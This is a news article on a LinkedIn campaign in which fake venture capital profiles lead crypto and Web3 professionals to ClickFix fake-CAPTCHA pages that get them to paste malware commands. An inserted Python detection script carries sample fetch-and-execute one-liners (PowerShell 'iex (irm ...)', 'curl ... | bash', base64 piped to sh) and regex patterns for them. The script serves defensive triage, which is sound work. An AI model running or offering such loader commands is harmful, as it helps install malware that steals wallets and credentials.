Fake venture capital profiles push malware through LinkedIn

Cybersecurity researchers have uncovered a coordinated malware campaign that uses fabricated venture capital identities on LinkedIn to target professionals in cryptocurrency and Web3 sectors, employing deceptive CAPTCHA prompts to trick victims into executing malicious commands on their own computers.

Security analysts say the operation combines social engineering, phishing and cross-platform malware delivery, focusing on individuals likely to be involved in blockchain startups, token projects and digital asset investment. By posing as venture capital executives seeking partnerships or investment opportunities, the attackers establish contact with potential victims before directing them to compromised websites designed to deploy malware.

Investigators examining the campaign describe a sophisticated approach that blends traditional phishing tactics with newer “ClickFix” techniques. Victims are typically approached through LinkedIn messages from accounts that appear to represent venture funds or investment firms. The attackers claim interest in funding a project or exploring collaboration, encouraging the target to review documents or a presentation hosted on an external site.

Once the victim opens the link, the site presents a fake CAPTCHA verification page. Instead of the familiar checkbox or image test used to confirm human activity, the page instructs the user to perform a few steps that look routine but are in fact malicious: open a terminal (or, on Windows, the Run dialog), paste a command and press Enter, all under the pretext of completing verification. ClickFix pages in general have already placed that command on the clipboard with script on the page, so the victim never has to type it and rarely reads it. Executing the pasted command installs the malware directly onto the victim's device.

Cybersecurity specialists note that the technique relies on the victim running the command themselves, which sidesteps many traditional protections: there is no exploit, no macro and no downloaded executable for tools keyed on those to block, and the first stage runs under the user's own account as a child of the shell or Run dialog the user opened. Because the activity starts from a user-launched process, endpoint security tools may initially treat it as legitimate system behaviour. The process tree and command line are still visible to endpoint telemetry, and that is where detection of this technique has to happen.

Researchers analysing the campaign say it targets professionals involved in cryptocurrency development, blockchain infrastructure and Web3 services, groups that often interact with venture capital firms and may therefore be more receptive to investment inquiries. Attackers exploit this dynamic by creating detailed LinkedIn profiles that appear credible, including fabricated employment histories, professional photographs and connections to other accounts.

Fake venture capital firms featured in the campaign include entities that sound plausible but have no trace in corporate or fund registries. Profiles linked to these fictitious funds present themselves as investment executives specialising in digital assets or blockchain technology, increasing the likelihood that Web3 entrepreneurs will engage with them.

After establishing contact, the attackers gradually move the conversation away from LinkedIn messaging to external platforms or websites. Victims may be invited to review a “pitch deck”, schedule a meeting or download project materials. The links provided in these messages lead to websites hosting the fake CAPTCHA interface and the malicious command instructions.

Cybersecurity firms examining the attack infrastructure say the malware deployed through the scheme is capable of harvesting sensitive information, including browser data, cryptocurrency wallet credentials and stored authentication tokens. Such data can allow attackers to access digital wallets, corporate systems or online accounts linked to blockchain projects.

Experts warn that the cryptocurrency and Web3 industries remain attractive targets for cybercriminals due to the high financial value associated with digital assets and the sector’s reliance on online collaboration. Professionals frequently use platforms such as LinkedIn to connect with investors and partners, creating opportunities for attackers to impersonate legitimate contacts.

Security analysts also highlight the growing use of social engineering tactics that require victims to initiate the compromise themselves. Rather than relying solely on malicious downloads or attachments, attackers increasingly employ psychological manipulation that persuades users to bypass safeguards voluntarily.

The ClickFix method represents an evolution of such tactics. By imitating CAPTCHA systems commonly used to prevent automated activity, attackers exploit a familiar security mechanism to disguise malicious instructions. Victims may believe they are completing a routine verification step, unaware that they are executing commands that compromise their system.

Researchers say the campaign operates across multiple operating systems, suggesting that attackers designed the malicious scripts to function on both Windows and macOS environments. ClickFix pages of this kind typically inspect the visitor's browser to decide which instructions to show: a PowerShell one-liner for Windows users and a shell command for macOS users. This cross-platform capability increases the potential impact of the operation, particularly within technology-focused sectors where a range of operating systems is common.
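The execution pattern described above, a fake CAPTCHA page talking the user into pasting a command into the Run dialog or a terminal, and its Windows and macOS variants, leave a characteristic trace in endpoint telemetry. The following Python script is an added example written for this edit; it is not code from the article or from the researchers it cites. It scores constructed, simplified process-creation records (operating system, parent image, child image, command line, tab-separated) on two generic ClickFix signals: a user-facing shell (explorer.exe, Terminal) spawning an interpreter, and loader-style command-line content, decoding embedded base64 so that `-EncodedCommand` and `base64 -d` wrappers do not hide the loader from the string checks. All patterns, weights, thresholds and sample records are assumptions of the example, not indicators from this campaign; example.invalid is a reserved placeholder hostname.

```python
"""Heuristic triage of ClickFix-style process telemetry (added example, not the
article's or any vendor's code). Sample records and patterns are constructed."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host_os: str   # "windows" or "macos"
    parent: str    # parent process image name
    image: str     # child process image name
    cmdline: str   # child command line as recorded by the sensor


# Parent/child pairs consistent with "the user pasted this into Run or a terminal".
# On Windows a command entered in the Run dialog is spawned by explorer.exe.
PASTE_PARENTS = {"windows": {"explorer.exe"}, "macos": {"terminal", "iterm2", "login"}}
INTERPRETERS = {
    "windows": {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"},
    "macos": {"sh", "bash", "zsh", "osascript", "curl"},
}

# Generic loader traits seen across ClickFix campaigns; none is specific to this one.
CMDLINE_PATTERNS = [
    (re.compile(r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded powershell"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I), "remote fetch"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\|\s*(?:sh|bash|zsh)\b", re.I), "piped to shell"),
    (re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), "base64 decode"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta remote script"),
    # ClickFix one-liners often end in a comment that echoes the fake CAPTCHA text.
    (re.compile(r"(?:#|::|rem\s)\s*(?:i am not a robot|captcha|verification id|ray id)", re.I), "captcha-themed comment"),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
THRESHOLD = 3  # parent/child alone scores 2, so it never fires without a content signal


def decode_embedded_base64(text: str) -> list[str]:
    """Return plaintext for every base64 run in text that decodes cleanly.
    PowerShell -EncodedCommand carries UTF-16LE, shell loaders usually UTF-8; the
    null bytes of UTF-16LE ASCII are the tell used to choose the codec."""
    out = []
    for blob in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        decoded = raw.decode("utf-16le" if b"\x00" in raw else "utf-8", errors="ignore")
        if decoded.strip() and decoded.isprintable():
            out.append(decoded)
    return out


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Score one process-creation record; higher means more ClickFix-like."""
    os_key, parent, image = ev.host_os.lower(), ev.parent.lower(), ev.image.lower()
    score, reasons = 0, []
    if parent in PASTE_PARENTS.get(os_key, set()) and image in INTERPRETERS.get(os_key, set()):
        score += 2
        reasons.append(f"{parent} -> {image}")
    for pat, label in CMDLINE_PATTERNS:
        if pat.search(ev.cmdline):
            score += 1
            reasons.append(label)
    for plain in decode_embedded_base64(ev.cmdline):  # look through the wrapper
        for pat, label in CMDLINE_PATTERNS:
            if pat.search(plain):
                score += 1
                reasons.append("decoded: " + label)
    return score, reasons


def parse_line(line: str) -> ProcEvent:
    """Parse one tab-separated record: os, parent, image, cmdline."""
    host_os, parent, image, cmdline = line.split("\t", 3)
    return ProcEvent(host_os, parent, image, cmdline)


def triage(records: str) -> list[tuple[ProcEvent, int, list[str]]]:
    """Return the records that reach THRESHOLD, each with its score and reasons."""
    hits = []
    for line in records.splitlines():
        if line.strip():
            ev = parse_line(line)
            score, reasons = score_event(ev)
            if score >= THRESHOLD:
                hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry: a simplified stand-in for EDR process-creation events.
ENC_PS = base64.b64encode("iex (irm https://example.invalid/v)".encode("utf-16le")).decode()
ENC_SH = base64.b64encode(b"curl -fsSL https://example.invalid/s | sh").decode()
SAMPLE = "\n".join([
    'windows\texplorer.exe\tpowershell.exe\tpowershell -w hidden -c "iex (irm https://example.invalid/v)" # I am not a robot - reCAPTCHA Verification ID: 8312',
    f"windows\texplorer.exe\tpowershell.exe\tpowershell -NoP -W Hidden -Enc {ENC_PS}",
    "windows\texplorer.exe\tnotepad.exe\tnotepad.exe C:\\Users\\dev\\notes.txt",
    "windows\tcode.exe\tpowershell.exe\tpowershell -NoProfile -c Get-ChildItem",
    "macos\tterminal\tzsh\tzsh -c 'curl -fsSL https://example.invalid/s | bash'",
    f"macos\tterminal\tzsh\tzsh -c 'echo {ENC_SH} | base64 -D | sh'",
    "macos\tterminal\tzsh\tzsh -lc 'git status'",
])

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE):
        print(f"[{score}] {ev.host_os}: {ev.parent} -> {ev.image}")
        print("     " + "; ".join(reasons))
```

Run directly, it prints the four flagged records and leaves the benign ones alone: the parent/child pairing scores 2 on its own, so `zsh -lc 'git status'` in a terminal is not flagged, while the same parent running `curl ... | bash` is. In a real deployment the same checks map onto process-creation events (Sysmon Event ID 1 on Windows) and, for commands entered in the Run dialog, onto the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which records what was typed there.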

Cybersecurity specialists urge professionals in blockchain and cryptocurrency fields to treat unsolicited investment approaches with caution, especially when communication shifts quickly from established platforms to external links or documents. Two checks cut through most of these schemes: a legitimate CAPTCHA never asks you to open a terminal, the Run dialog or a command prompt, so any verification page that does should be treated as an attack; and a fund and its named partners should be verified through the firm's own website and a contact route found independently of the LinkedIn profile, not through links or details supplied in the message.

LinkedIn has become a frequent target for threat actors seeking to infiltrate corporate networks or technology communities. The platform’s role as a professional networking hub allows attackers to gather information about potential targets, identify individuals working on high-value projects and craft personalised messages designed to appear credible.

Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.
